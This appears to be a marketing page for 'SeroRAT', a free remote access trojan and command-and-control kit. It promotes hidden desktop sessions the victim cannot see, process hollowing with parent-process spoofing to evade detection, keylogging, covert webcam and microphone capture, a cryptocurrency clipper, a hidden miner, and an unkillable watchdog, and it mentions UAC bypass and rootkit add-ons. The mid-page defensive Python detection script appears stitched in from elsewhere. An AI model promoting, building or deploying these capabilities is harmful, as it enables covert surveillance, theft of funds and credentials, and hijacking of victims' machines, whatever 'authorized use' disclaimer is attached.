Open source  ·  MIT License  ·  Authorized use only

The C2 they charge $2,000 for. Free.

HVNC, DXGI remote desktop at 60fps, remote webcam via DirectShow, process hollowing with PPID spoof, NativeAOT stub — 40+ features. Everything the expensive ones have. None of the price tag.

7 MB stub · 40+ features · AES-256 · .NET 10 NativeAOT

[Screenshot: SeroRAT dashboard, client list with online clients]

Hidden Virtual Network Computing

HVNC creates a completely isolated Windows desktop session — invisible to the target. Chrome, Firefox, Edge, Brave, Opera launch directly into the shadow session. The victim sees nothing. You see everything.

Each browser gets --start-maximized and fills the HVNC frame. Mouse and keyboard are forwarded with sub-pixel accuracy. The clipboard syncs on a 400ms toggle you control.

isolated desktop · 9 browsers · clipboard sync · real-time input

Process Hollowing — RunPE

The injected binary never touches disk. A legitimate host process (svchost, dllhost) is created suspended, its memory unmapped, and your payload written in its place — then resumed.

PPID spoofing via UpdateProcThreadAttribute makes the injected process appear as a child of explorer.exe or winlogon.exe. Task Manager, Process Explorer — they see nothing suspicious.

no disk write · PPID spoof · suspended create · memory remap
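
A defender-side check for the parent/child relationship described above, as an added example that is not part of SeroRAT's code: on a typical Windows install svchost.exe is started by services.exe and dllhost.exe by svchost.exe, so either one reporting explorer.exe or winlogon.exe as its parent stands out. The baseline table, the Sysmon Event ID 1 style field names and the sample events are assumptions constructed for illustration.

```python
# Added example: flag host processes whose reported parent breaks the usual baseline.
import ntpath

# Typical parents on a stock Windows install (assumption: tune to your fleet).
EXPECTED_PARENT = {
    "svchost.exe": {"services.exe"},
    "dllhost.exe": {"svchost.exe"},
    "searchprotocolhost.exe": {"searchindexer.exe"},
}
# Directories these binaries legitimately run from.
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}

def check_event(ev):
    """Return the reasons a process-creation event looks anomalous (empty if none)."""
    image = ev["Image"].lower()
    name = ntpath.basename(image)
    reasons = []
    if name not in EXPECTED_PARENT:
        return reasons  # not one of the host binaries we baseline
    parent_name = ntpath.basename(ev["ParentImage"].lower())
    if parent_name not in EXPECTED_PARENT[name]:
        reasons.append(f"{name} reports parent {parent_name}")
    if ntpath.dirname(image) not in SYSTEM_DIRS:
        reasons.append(f"{name} runs from {ntpath.dirname(image)}")
    return reasons

def hunt(events):
    """Map ProcessId -> reasons for every event with at least one finding."""
    return {ev["ProcessId"]: r for ev in events if (r := check_event(ev))}

# Constructed sample events (not real telemetry).
SAMPLE = [
    {"ProcessId": 812, "Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Windows\System32\services.exe"},
    {"ProcessId": 4404, "Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"ProcessId": 5120, "Image": r"C:\Windows\System32\dllhost.exe",
     "ParentImage": r"C:\Windows\System32\winlogon.exe"},
    {"ProcessId": 6001, "Image": r"C:\Windows\System32\dllhost.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe"},
]

if __name__ == "__main__":
    for pid, reasons in hunt(SAMPLE).items():
        print(pid, "; ".join(reasons))
```
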

Open source

  • Server — WPF C#
  • Stub — NativeAOT x64
  • Builder
  • All 40+ features
  • TLS protocol

Private / yours to build

  • Polymorphic crypter (private)
  • UAC bypass chain (private)
  • Rootkit integration (implement yourself)

The rootkit is documented in the stub code and works — wire it in your own build.

What it does.

Monitoring

  • Remote Desktop — DXGI + GDI fallback
  • HVNC — isolated hidden desktop
  • Webcam — DirectShow + VFW
  • Microphone — live listen + WAV save
  • Keylogger — disk logging by date
  • Performance Monitor — CPU / RAM / Net
  • Remote Shell — cmd / PowerShell

Administration

  • File Manager — browse / upload / exec
  • Process Manager — tree view, icons
  • Registry Editor — HKLM + HKCU
  • Service / Window / Device Manager
  • TCP Connections + firewall rules
  • Startup Manager
  • Installed Programs — silent uninstall

Offensive

  • RunPE — in-memory + PPID spoof
  • Reverse SOCKS5 proxy
  • Crypto Clipper — 10 coins
  • AutoTask DLL plugins — C++, compiled on demand
  • XMR Miner — configurable hollow target, idle throttle
  • Telegram first-exec notification
  • Per-HWID AutoTask deduplication

The market.

What others charge for the same thing — often worse, and closed to inspect.

Cobalt Strike   $5,000 / yr        commercial, closed source
Brute Ratel     $2,500 / yr        commercial, closed source
PureRAT         $2,000 lifetime    reversed & leaked anyway
SeroRAT         $0 — open source   MIT, full source on GitHub

Real screenshots.

No mocked-up demos. Actual captures from the server.

No shortcuts.

The details that separate a demo from something you'd actually deploy.

  • TLS 1.2+ with certificate pinning

    Shared-key auth on every packet. 3s heartbeat with RTT measurement. Multi-host auto-reconnect with configurable round-robin delay.

  • PPID spoofing in RunPE

    UpdateProcThreadAttribute sets the injected process parent to explorer.exe or winlogon.exe depending on elevation level.

  • Watchdog that can't be killed

    4 guardian processes in dllhost/SearchProtocolHost, staggered 800ms apart. File lock + FileSystemWatcher for instant restore.

RemoteDesktopFeature.cs
// DXGI Desktop Duplication — GPU direct
DxgiCapture.TryInit(monitorIndex);

while (_running)
{
    // Block on VBLANK — natural 60fps pacing
    var pixels = DxgiCapture.CaptureFrame(
        out w, out h, timeout: 16);

    // 64×64 block diff vs previous frame
    var changed = BlockDiff(pixels, _prev, w, h);
    if (changed.Count == 0) continue;

    await SendDeltaAsync(changed, quality);
    _prev = pixels;
}

Open source.
No strings.

Fork it. Build on it. Make it yours.
Just use it on systems you have authorization for.
